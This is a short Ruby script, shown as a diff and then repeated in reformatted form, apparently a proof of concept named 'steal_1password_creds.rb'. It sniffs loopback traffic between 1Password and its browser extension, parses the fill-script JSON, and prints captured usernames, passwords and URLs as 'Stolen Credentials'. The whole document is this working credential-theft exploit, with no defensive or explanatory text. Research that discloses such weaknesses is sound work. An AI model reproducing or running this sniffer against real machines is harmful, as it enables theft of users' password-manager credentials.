lctrcl · May 23, 2016 20:23
diff --git a/steal_1password_creds.rb b/steal_1password_creds.rb
 # Path setting slight of hand:
 $: << File.expand_path("../../lib", __FILE__)
 require 'packetfu'
 require 'json'

 capture_thread = Thread.new do
  cap = PacketFu::Capture.new(:iface => 'lo0', :start => true)
  cap.stream.each do |p|
    pkt = PacketFu::Packet.parse p
    if pkt.payload.include?("executeFillScript")
      parsed_json = JSON.parse(pkt.payload.match(/{"action.*/)[0])

      username = parsed_json["payload"]["script"][1][2]
      password = parsed_json["payload"]["script"][3][2]
      url = parsed_json["payload"]["url"]

      puts "[+] Stolen Credentials: user(#{username}), password(#{password}), url(#{url})"
    end
  end
 end

 puts "Listening for 1Password interprocess traffic on loopback..."
 capture_thread.join
	# Path setting slight of hand:
	$: << File.expand_path("../../lib", __FILE__)
	require 'packetfu'
	require 'json'

	capture_thread = Thread.new do
	cap = PacketFu::Capture.new(:iface => 'lo0', :start => true)
	cap.stream.each do \|p\|
	pkt = PacketFu::Packet.parse p
	if pkt.payload.include?("executeFillScript")
	parsed_json = JSON.parse(pkt.payload.match(/{"action.*/)[0])

	username = parsed_json["payload"]["script"][1][2]
	password = parsed_json["payload"]["script"][3][2]
	url = parsed_json["payload"]["url"]

	puts "[+] Stolen Credentials: user(#{username}), password(#{password}), url(#{url})"
	end
	end
	end

	puts "Listening for 1Password interprocess traffic on loopback..."
	capture_thread.join